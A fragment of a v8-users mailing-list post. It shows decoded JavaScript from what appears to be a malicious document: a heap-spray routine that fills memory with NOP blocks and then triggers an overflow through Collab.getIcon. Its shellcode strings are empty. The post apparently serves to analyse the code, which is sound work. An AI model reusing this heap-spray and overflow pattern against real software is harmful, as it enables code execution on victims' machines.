it come out as 

var shellcode = unescape(""); garbage= unescape("") + shellcode; nopblock = 
unescape(""); headersize = 10; acl = headersize+garbage.length; 
while(nopblock.length<acl) nopblock+=nopblock; fillblock= 
nopblock.substring(0, acl); block = nopblock.substring(0, 
nopblock.length-acl); while(block.length+acl<0x40000)block = 
block+block+fillblock; memory= new Array(); for (i=0;i<180;i++) memory[i] = 
block + garbage; var buffersize = 4012; var buffer = Array(buffersize); for 
(i=0; i<buffersize; i++) { buffer[i] = unescape(""); } 
Collab.getIcon(buffer+"_N.bundle"); 

-- 
v8-users mailing list
[email protected]
http://groups.google.com/group/v8-users

Reply via email to